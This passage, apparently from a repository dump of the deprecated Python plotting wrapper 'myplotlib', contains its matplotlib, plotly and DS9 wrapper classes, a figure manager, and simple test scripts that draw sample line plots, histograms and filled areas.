plot).')\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.LogNorm(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\t\tz[z!=z] = float('inf')\n\t\tif 'colorscalelabel' in validated_args:\n\t\t\tcolorscalelabel = validated_args.get('colorscalelabel')\n\t\t\tvalidated_args.pop('colorscalelabel')\n\t\tif x is None and y is None:\n\t\t\tcs = self.matplotlib_ax.pcolormesh(z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telif x is not None and y is not None:\n\t\t\tcs = self.matplotlib_ax.pcolormesh(x, y, z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telse: \n\t\t\traise ValueError('You must provide either \"both x and y\" or \"neither x nor y\"')\n\t\tcbar = self.matplotlib_fig.colorbar(cs)\n\t\tif 'colorscalelabel' in locals():\n\t\t\tcbar.set_label(colorscalelabel, rotation = 90)\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().contour(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif validated_args.get('norm') in [None, 'lin']: # linear normalization\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.Normalize(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\telif validated_args.get('norm') == 'log':\n\t\t\ttemp = np.squeeze(np.asarray(z))\n\t\t\twhile temp.min() <= 0:\n\t\t\t\ttemp = temp[temp!=temp.min()]\n\t\t\tif (z<=0).any():\n\t\t\t\tz[z<=0] = float('Nan')\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"inf\") values for plotting (i.e. they will not appear in the plot).')\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.LogNorm(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\t\tz[z!=z] = float('inf')\n\t\tif x is None and y is None:\n\t\t\tcs = self.matplotlib_ax.contour(z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telif x is not None and y is not None:\n\t\t\tcs = self.matplotlib_ax.contour(x, y, z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telse: \n\t\t\traise ValueError('You must provide either \"both x and y\" or \"neither x nor y\"')\n\t\tcbar = self.matplotlib_fig.colorbar(cs)\n\t\tif 'colorscalelabel' in locals():\n\t\t\tcbar.set_label(colorscalelabel, rotation = 90)\n\t\tself.matplotlib_ax.clabel(cs, inline=True, fontsize=10)\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tvalidated_args = super().fill_between(x, y1, y2, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty1 = validated_args['y1']\n\t\tvalidated_args.pop('y1')\n\t\ty2 = validated_args['y2']\n\t\tvalidated_args.pop('y2')\n\t\tself.matplotlib_ax.fill_between(x, y1, y2, **validated_args)\n\t\tif validated_args.get('label') != None: # If you gave me a label it is obvious for me that you want to display it, no?\n\t\t\tself.matplotlib_ax.legend()\n" }, { "alpha_fraction": 0.5837462544441223, "alphanum_fraction": 0.5867195129394531, "avg_line_length": 18.403846740722656, "blob_id": "7f5b6f07110c62be8a2a9d8bcd6c5311fbf0cfb2", "content_id": "fabb320c24ea9dc8fbcdc2551b622bdbd11388ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1009, "license_type": "permissive", "max_line_length": 56, "num_lines": 52, "path": "/tests/test_plot.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(1,3)\ny = x**3\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'simple plot with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfig.plot(\n\t\tx,\n\t\ty,\n\t\tlabel = 'Simple plot',\n\t)\n\tfig = mpl.manager.new(\n\t\ttitle = f'Markers test {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor marker in ['.', '+', 'x', 'o']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\ty + np.random.randn(len(x)),\n\t\t\tmarker = marker,\n\t\t\tlabel = f'Markers {marker}',\n\t\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'Linestyle test {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor linestyle in ['solid', 'none', 'dashed', 'dotted']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\ty + np.random.randn(len(x)),\n\t\t\tmarker = '.',\n\t\t\tlinestyle = linestyle,\n\t\t\tlabel = f'Linestyle {linestyle}',\n\t\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.5847457647323608, "alphanum_fraction": 0.6059321761131287, "avg_line_length": 15.275861740112305, "blob_id": "b978eeb9479b2eaac7875c1880ea284a094bc261", "content_id": "adc12fa52be335261bdcca8a565b40ea8ec78901", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 472, "license_type": "permissive", "max_line_length": 41, "num_lines": 29, "path": "/tests/test_fill_between.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(-1,1)\ny = x**3\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'Fill between with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfig.fill_between(\n\t\tx,\n\t\ty,\n\t\tlabel = 'Fill between 0 and y',\n\t)\n\tfig.fill_between(\n\t\tx,\n\t\ty*1.1,\n\t\ty*.9,\n\t\tlabel = 'Fill between two curves',\n\t\tcolor = (0,0,0),\n\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6800428032875061, "alphanum_fraction": 0.6832530498504639, "avg_line_length": 36.380001068115234, "blob_id": "44ecef8a991c9621f8ad1729d63b11231e8dc452", "content_id": "257da8648168c9c42a333257d570df87bac6dfbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1869, "license_type": "permissive", "max_line_length": 122, "num_lines": 50, "path": "/myplotlib/wrapper_saods9.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\n\nclass MPLSaoImageDS9Wrapper(MPLFigure):\n\t\"\"\"\n\tThis is a very specific type of figure, intended to be used with \n\timages.\n\t\"\"\"\n\tDIRECTORY_FOR_TEMPORARY_FILES = '.myplotlib_ds9_temp'\n\t_norm = 'lin'\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport os\n\t\tself.os = os\n\t\tfrom astropy.io import fits\n\t\tself.astropy_io_fits = fits\n\t\tif not self.os.path.isdir(self.DIRECTORY_FOR_TEMPORARY_FILES):\n\t\t\tself.os.makedirs(self.DIRECTORY_FOR_TEMPORARY_FILES)\n\t\n\t@property\n\tdef title(self):\n\t\treturn self._title.replace(' ', '_')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\thdul_new = self.astropy_io_fits.PrimaryHDU(z)\n\t\tif f'{self.title}.fits' in self.os.listdir(self.DIRECTORY_FOR_TEMPORARY_FILES):\n\t\t\tself.os.remove(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\thdul_new.writeto(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tself._norm = 'log'\n\t\n\tdef show(self):\n\t\tself.os.system(f'ds9 {self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits' + (' -log' if self._norm == 'log' else ''))\n\t\n\tdef close(self):\n\t\tif len(self.os.listdir(self.DIRECTORY_FOR_TEMPORARY_FILES)) == 0:\n\t\t\tself.os.rmdir(self.DIRECTORY_FOR_TEMPORARY_FILES)\n\t\tself.__del__()\n\t\n\tdef __del__(self):\n\t\tif self.os.path.exists(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits'):\n\t\t\tself.os.remove(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\n\tdef save(self, fname):\n\t\tif fname[:-5] != '.fits':\n\t\t\tfname = '.'.join(fname.split('.')[:-1] + ['fits'])\n\t\tcopyfile(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits', fname)\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5767326951026917, "avg_line_length": 15.15999984741211, "blob_id": "4bd1f66c4d0272b0fa466d56b9e0488dcdb197cc", "content_id": "90b38ce9790e71cfd878e5878d09e755e1891c46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "permissive", "max_line_length": 40, "num_lines": 25, "path": "/tests/test_markers.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(0,1)\n\nfor package in ['plotly', 'matplotlib']:\n\tfig = mpl.manager.new(\n\t\ttitle = 'Markers test',\n\t\tpackage = package,\n\t)\n\tfig.plot(\n\t\tx,\n\t\tx**3,\n\t\tlabel = 'No markers',\n\t)\n\tfor marker in ['.','x','+','o']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\tx**np.random.rand(),\n\t\t\tmarker = marker,\n\t\t\tlabel = f'Marker = {marker}',\n\t\t\tlinestyle = '',\n\t\t)\n\nmpl.manager.show()\n" }, { "alpha_fraction": 0.6421740055084229, "alphanum_fraction": 0.6497148871421814, "avg_line_length": 37.28873062133789, "blob_id": "7845abf6e4991ff5d16914d4072df922552cdbc9", "content_id": "1c2a80e06b7f3788d7d742f70e311687b6357e75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10874, "license_type": "permissive", "max_line_length": 369, "num_lines": 284, "path": "/myplotlib/wrapper_plotly.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\nimport numpy as np\n\nclass MPLPlotlyWrapper(MPLFigure):\n\tLINESTYLE_TRANSLATION = {\n\t\t'solid': None,\n\t\t'none': None,\n\t\t'dashed': 'dash',\n\t\t'dotted': 'dot',\n\t}\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport plotly.graph_objects as go # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\timport plotly # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\tself.plotly_go = go\n\t\tself.plotly = plotly\n\t\tself.plotly_fig = go.Figure()\n\t\n\tdef set(self, **kwargs):\n\t\tsuper().set(**kwargs) # This does a validation of the arguments and stores them in the properties of the super() figure.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties. Now you must access like \"self.title\" and so.\n\t\tif self.show_title == True and self.title != None:\n\t\t\tself.plotly_fig.update_layout(title = self.title)\n\t\tself.plotly_fig.update_layout(\n\t\t\txaxis_title = self.xlabel,\n\t\t\tyaxis_title = self.ylabel,\n\t\t)\n\t\t# Axes scale:\n\t\tif self.xscale in [None, 'lin']:\n\t\t\tpass\n\t\telif self.xscale == 'log':\n\t\t\tself.plotly_fig.update_layout(xaxis_type = 'log')\n\t\tif self.yscale in [None, 'lin']:\n\t\t\tpass\n\t\telif self.yscale == 'log':\n\t\t\tself.plotly_fig.update_layout(yaxis_type = 'log')\n\t\t\n\t\tif self.aspect == 'equal':\n\t\t\tself.plotly_fig.update_yaxes(\n\t\t\t\tscaleanchor = \"x\",\n\t\t\t\tscaleratio = 1,\n\t\t\t)\n\t\t\n\t\tif self.subtitle != None:\n\t\t\tself.plotly_fig.add_annotation(\n\t\t\t\ttext = self.subtitle.replace('\\n','<br>'),\n\t\t\t\txref = \"paper\", \n\t\t\t\tyref = \"paper\",\n\t\t\t\tx = .5, \n\t\t\t\ty = 1,\n\t\t\t\talign = 'left',\n\t\t\t\tarrowcolor=\"#ffffff\",\n\t\t\t\tfont=dict(\n\t\t\t\t\tfamily=\"Courier New, monospace\",\n\t\t\t\t\tcolor=\"#999999\"\n\t\t\t\t),\n\t\t\t)\n\t\n\tdef show(self):\n\t\tself.plotly_fig.show()\n\t\n\tdef save(self, fname, include_plotlyjs='cdn', *args, **kwargs):\n\t\tif fname is None:\n\t\t\tfname = self.title\n\t\tif fname is None:\n\t\t\traise ValueError(f'Please provide a name for saving the figure to a file by the <fname> argument.')\n\t\tif fname[-5:] != '.html':\n\t\t\tif len(fname.split('.')) > 1:\n\t\t\t\tsplitted = fname.split('.')\n\t\t\t\tsplitted[-1] = 'html'\n\t\t\t\tfname = '.'.join(splitted)\n\t\t\telse:\n\t\t\t\tfname = f'{fname}.html'\n\t\tself.plotly.offline.plot(\n\t\t\tself.plotly_fig, \n\t\t\tfilename = fname,\n\t\t\tauto_open = False, \n\t\t\tinclude_plotlyjs = include_plotlyjs,\n\t\t\t*args, \n\t\t\t**kwargs\n\t\t)\n\t\n\tdef close(self):\n\t\tdel(self.plotly_fig)\n\t\n\tdef plot(self, x, y=None, **kwargs):\n\t\tvalidated_args = super().plot(x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Scatter(\n\t\t\t\tx = validated_args['x'],\n\t\t\t\ty = validated_args['y'],\n\t\t\t\tname = validated_args.get('label'),\n\t\t\t\topacity = validated_args.get('alpha'),\n\t\t\t\tmode = self.translate_marker_and_linestyle_to_mode(validated_args.get('marker'), validated_args.get('linestyle')),\n\t\t\t\tmarker_symbol = self._map_marker_to_plotly(validated_args.get('marker')),\n\t\t\t\tshowlegend = True if validated_args.get('label') != None else False,\n\t\t\t\tline = dict(\n\t\t\t\t\tdash = self.LINESTYLE_TRANSLATION[validated_args.get('linestyle')] if 'linestyle' in validated_args else None,\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\tif validated_args.get('color') != None:\n\t\t\tself.plotly_fig['data'][-1]['marker']['color'] = self._rgb2hexastr_color(validated_args.get('color'))\n\t\tif validated_args.get('linewidth') != None:\n\t\t\tself.plotly_fig['data'][-1]['line']['width'] = validated_args.get('linewidth')\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tvalidated_args = super().fill_between(x, y1, y2, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty1 = validated_args['y1']\n\t\tvalidated_args.pop('y1')\n\t\ty2 = validated_args['y2']\n\t\tvalidated_args.pop('y2')\n\t\tself.plot(\n\t\t\tx = list(x) + list(x)[::-1],\n\t\t\ty = list(y1) + list(y2)[::-1],\n\t\t\t**validated_args,\n\t\t)\n\t\tself.plotly_fig['data'][-1]['fill'] = 'toself'\n\t\tself.plotly_fig['data'][-1]['hoveron'] = 'points'\n\t\tself.plotly_fig['data'][-1]['line']['width'] = 0\n\t\n\tdef error_band(self, x, y, ytop, ylow, **kwargs):\n\t\tvalidated_args = super().error_band(x, y, ytop, ylow, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args['y']\n\t\tvalidated_args.pop('y')\n\t\tytop = validated_args['ytop']\n\t\tvalidated_args.pop('ytop')\n\t\tylow = validated_args['ylow']\n\t\tvalidated_args.pop('ylow')\n\t\tlegendgroup = str(np.random.rand()) + str(np.random.rand())\n\t\tself.plot(x, y, **validated_args)\n\t\tself.plotly_fig['data'][-1]['legendgroup'] = legendgroup\n\t\tself.fill_between(\n\t\t\tx, \n\t\t\tylow, \n\t\t\tytop,\n\t\t\tcolor = validated_args['color'],\n\t\t)\n\t\tself.plotly_fig['data'][-1]['showlegend'] = False\n\t\tself.plotly_fig['data'][-1]['legendgroup'] = legendgroup\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tvalidated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tself.plotly_fig.add_traces(\n\t\t\tself.plotly_go.Scatter(\n\t\t\t\tx = validated_args['bins'], \n\t\t\t\ty = validated_args['counts'],\n\t\t\t\tmode = self.translate_marker_and_linestyle_to_mode(validated_args.get('marker'), validated_args.get('linestyle')),\n\t\t\t\topacity = validated_args.get('alpha'),\n\t\t\t\tname = validated_args.get('label'),\n\t\t\t\tshowlegend = True if validated_args.get('label') != None else False,\n\t\t\t\tline = dict(\n\t\t\t\t\tshape='hvh',\n\t\t\t\t\tdash = self.LINESTYLE_TRANSLATION[validated_args.get('linestyle')] if 'linestyle' in validated_args else None,\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t# ~ self.fig.update_layout(barmode='overlay')\n\t\tif validated_args.get('color') != None:\n\t\t\tself.plotly_fig['data'][-1]['marker']['color'] = self._rgb2hexastr_color(validated_args.get('color'))\n\t\tif validated_args.get('linewidth') != None:\n\t\t\tself.plotly_fig['data'][-1]['line']['width'] = validated_args.get('linewidth')\n\t\n\tdef hist2d(self, _______, **kwargs):\n\t\t# ~ validated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\t# ~ del(kwargs) # Remove it to avoid double access to the properties.\n\t\traise NotImplementedError(f'<hist2d> not yet implemented for {self.__class__.__name__}')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif x is not None and y is not None:\n\t\t\tif x.size == y.size == z.size:\n\t\t\t\tx = x[0]\n\t\t\t\ty = y.transpose()[0]\n\t\tz2plot = z\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tif (z<=0).any():\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"NaN\") values for plotting (i.e. they will not appear in the plot).')\n\t\t\t\tz2plot[z2plot<=0] = float('NaN')\n\t\t\tz2plot = np.log(z2plot)\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Heatmap(\n\t\t\t\tz = z2plot,\n\t\t\t\tx = x,\n\t\t\t\ty = y,\n\t\t\t\tcolorbar = dict(\n\t\t\t\t\ttitle = (('log ' if validated_args.get('norm') == 'log' else '') + validated_args.get('colorscalelabel')) if validated_args.get('colorscalelabel') is not None else None,\n\t\t\t\t\ttitleside = 'right',\n\t\t\t\t),\n\t\t\t\thovertemplate = f'{(self.xlabel if self.xlabel is not None else \"x\")}: %{{x}}<br>{(self.ylabel if self.ylabel is not None else \"y\")}: %{{y}}<br>{(validated_args.get(\"colorscalelabel\") if \"colorscalelabel\" in validated_args is not None else \"color scale\")}: %{{z}}<extra></extra>', # https://community.plotly.com/t/heatmap-changing-x-y-and-z-label-on-tooltip/23588/6\n\t\t\t)\n\t\t)\n\t\tself.plotly_fig.update_layout(legend_orientation=\"h\")\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tif 'levels' in validated_args:\n\t\t\t# See in Matplotlib's documentation to see what this is supposed to do.\n\t\t\traise NotImplementedError(f'<levels> not yet implemented for <contour> for Plotly.')\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif x is not None and y is not None:\n\t\t\tif x.size == y.size == z.size:\n\t\t\t\tx = x[0]\n\t\t\t\ty = y.transpose()[0]\n\t\tz2plot = z\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tif (z<=0).any():\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"NaN\") values for plotting (i.e. they will not appear in the plot).')\n\t\t\t\tz2plot[z2plot<=0] = float('NaN')\n\t\t\tz2plot = np.log(z2plot)\n\t\tself.plotly_fig.add_trace(\n\t\t\tself.plotly_go.Contour(\n\t\t\t\tz = z2plot,\n\t\t\t\tx = x,\n\t\t\t\ty = y,\n\t\t\t\tcolorbar = dict(\n\t\t\t\t\ttitle = (('log ' if validated_args.get('norm') == 'log' else '') + validated_args.get('colorscalelabel')) if validated_args.get('colorscalelabel') is not None else None,\n\t\t\t\t\ttitleside = 'right',\n\t\t\t\t),\n\t\t\t\thovertemplate = f'{(self.xlabel if self.xlabel is not None else \"x\")}: %{{x}}<br>{(self.ylabel if self.ylabel is not None else \"y\")}: %{{y}}<br>{(validated_args.get(\"colorscalelabel\") if \"colorscalelabel\" in validated_args is not None else \"color scale\")}: %{{z}}<extra></extra>', # https://community.plotly.com/t/heatmap-changing-x-y-and-z-label-on-tooltip/23588/6\n\t\t\t\tcontours=dict(\n\t\t\t\t\tcoloring = 'heatmap',\n\t\t\t\t\tshowlabels = True, # show labels on contours\n\t\t\t\t\tlabelfont = dict( # label font properties\n\t\t\t\t\t\tcolor = 'white',\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\tself.plotly_fig.update_layout(legend_orientation=\"h\")\n\t\n\tdef _rgb2hexastr_color(self, rgb_color: tuple):\n\t\t# Assuming that <rgb_color> is a (r,g,b) tuple.\n\t\tcolor_str = '#'\n\t\tfor rgb in rgb_color:\n\t\t\tcolor_hex_code = hex(int(rgb*255))[2:]\n\t\t\tif len(color_hex_code) < 2:\n\t\t\t\tcolor_hex_code = f'0{color_hex_code}'\n\t\t\tcolor_str += color_hex_code\n\t\treturn color_str\n\t\n\tdef _map_marker_to_plotly(self, marker):\n\t\tif marker is None:\n\t\t\treturn None\n\t\tmarkers_map = {\n\t\t\t'.': 'circle',\n\t\t\t'+': 'cross',\n\t\t\t'x': 'x',\n\t\t\t'o': 'circle-open',\n\t\t}\n\t\treturn markers_map[marker]\n\t\n\tdef translate_marker_and_linestyle_to_mode(self, marker, linestyle):\n\t\tif marker == None and linestyle != 'none':\n\t\t\tmode = 'lines'\n\t\telif marker != None and linestyle != 'none':\n\t\t\tmode = 'lines+markers'\n\t\telif marker != None and linestyle == 'none':\n\t\t\tmode = 'markers'\n\t\telse:\n\t\t\tmode = 'lines'\n\t\treturn mode\n" }, { "alpha_fraction": 0.5987342000007629, "alphanum_fraction": 0.6215189695358276, "avg_line_length": 21.571428298950195, "blob_id": "c24d14b132a523522dcff88376bfc5b24bcec999", "content_id": "7edb1cb440ea9b2cbe379af420e6112a40434ff2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 790, "license_type": "permissive", "max_line_length": 54, "num_lines": 35, "path": "/tests/test_hist.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nsamples = [np.random.randn(999)*2*i for i in range(3)]\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'simple histogram with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,s in enumerate(samples):\n\t\tfig.hist(\n\t\t\ts,\n\t\t\tlabel = f'Plain histogram {idx}',\n\t\t\tlinestyle = ['solid','dashed','dotted'][idx],\n\t\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'specifying bins with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,s in enumerate(samples):\n\t\tfig.hist(\n\t\t\ts,\n\t\t\tbins = 5 if idx==0 else [0,2,3,3.5,4.4,4.5,4.6],\n\t\t\tlabel = f'Plain histogram {idx}',\n\t\t)\n\t\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6911299824714661, "alphanum_fraction": 0.6933171153068542, "avg_line_length": 37.10185241699219, "blob_id": "e7fc77d19056b823649a76a5a758fb6ec9466e67", "content_id": "f6a7749fa7c36c7c3ce870b17771bf3226935db6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 144, "num_lines": 108, "path": "/myplotlib/__init__.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .wrapper_matplotlib import MPLMatplotlibWrapper\nfrom .wrapper_plotly import MPLPlotlyWrapper\nfrom .wrapper_saods9 import MPLSaoImageDS9Wrapper\nfrom .utils import get_timestamp\nimport os\nimport __main__\nfrom pathlib import Path\nimport warnings\n\nwarnings.warn(f'The package \"myplotlib\" is deprecated, not maintained anymore. Please use \"grafica\" instead https://github.com/SengerM/grafica')\n\nclass FigureManager:\n\tdef __init__(self):\n\t\tself.set_plotting_package('plotly')\n\t\tself.figures = []\n\t\n\tdef set_plotting_package(self, package):\n\t\tIMPLEMENTED_PACKAGES = ['matplotlib', 'plotly', 'ds9']\n\t\tif package not in IMPLEMENTED_PACKAGES:\n\t\t\traise ValueError('<package> must be one of ' + str(IMPLEMENTED_PACKAGES))\n\t\tself.plotting_package = package\n\t\n\tdef new(self, **kwargs):\n\t\tpackage_for_this_figure = kwargs.get('package') if 'package' in kwargs else self.plotting_package\n\t\tif 'package' in kwargs: kwargs.pop('package')\n\t\tif package_for_this_figure == 'plotly':\n\t\t\tself.figures.append(MPLPlotlyWrapper())\n\t\telif package_for_this_figure == 'matplotlib':\n\t\t\tself.figures.append(MPLMatplotlibWrapper())\n\t\telif package_for_this_figure == 'ds9':\n\t\t\tself.figures.append(MPLSaoImageDS9Wrapper())\n\t\tself.figures[-1].set(**kwargs)\n\t\tif 'title' not in kwargs:\n\t\t\tself.figures[-1].set(title = f'figure_{len(self.figures)}', show_title = False)\n\t\treturn self.figures[-1]\n\t\n\t# ~ def set_style(self, style):\n\t\t# ~ PLOTTING_STYLES = ['latex one column', 'latex two columns']\n\t\t# ~ style = style.lower()\n\t\t# ~ if style not in PLOTTING_STYLES:\n\t\t\t# ~ raise ValueError('<style> must be one of ' + str(PLOTTING_STYLES))\n\t\t# ~ elif style == 'latex one column' and self.plotting_package == 'matplotlib':\n\t\t\t# ~ plt.style.use(os.path.dirname(os.path.abspath(__file__)) + '/rc_styles/latex_one_column_rc_style')\n\t\t# ~ elif style == 'latex two columns' and self.plotting_package == 'matplotlib':\n\t\t\t# ~ plt.style.use(os.path.dirname(os.path.abspath(__file__)) + '/rc_styles/latex_two_columns_rc_style')\n\t\n\tdef save_all(self, timestamp=False, mkdir=True, format='png', delete_all=True, *args, **kwargs):\n\t\t\"\"\"\n\t\tUse this function to save all plots made with the current manager at once.\n\t\t\n\t\tArguments\n\t\t---------\n\t\ttimestamp : bool, optional \n\t\t\tDefault: False\n\t\t\tIf true then all file names will be identified with one (and the\n\t\t\tsame) timestamp. The timestamp is created at the moment this \n\t\t\tfunction is called. If you call this function twice, you'll have \n\t\t\ttwo different timestamps.\n\t\t\tThis is usefull when you want not to overwrite the plots each \n\t\t\ttime you run your code. Let's say you are doing a simulation and you\n\t\t\twant to keep the plots of each different run, then you can use\n\t\t\t\"timestamp = True\".\n\t\tmkdir : str or True/False\n\t\t\tDefault: True\n\t\t\tIf a string is passed then a directory will be created (with the\n\t\t\tspecified name) and all figures will be saved in there. If True\n\t\t\tthe name for the directory is the same as the name of the top\n\t\t\tlevel python script that called this function. If False, no directory\n\t\t\tis created an figures are saved in the current working directory.\n\t\tformat : string, optional\n\t\t\tDefault: 'png'\n\t\t\tFormat of image files. Default is 'png'. \n\t\t\"\"\"\n\t\tcurrent_timestamp = get_timestamp()\n\t\tif mkdir != False:\n\t\t\tif isinstance(mkdir, Path):\n\t\t\t\tmkdir = str(mkdir)\n\t\t\tif mkdir == True:\n\t\t\t\tmkdir = __main__.__file__.replace('.py', '') + '_saved_plots'\n\t\t\tdirectory = mkdir + '/'\n\t\t\tif not os.path.exists(directory):\n\t\t\t\tos.makedirs(directory)\n\t\telse:\n\t\t\tdirectory = './'\n\t\tfor k,_fig in enumerate(self.figures):\n\t\t\tfile_name = current_timestamp + ' ' if timestamp == True else ''\n\t\t\tfile_name += _fig.title if _fig.title != None else 'figure ' + 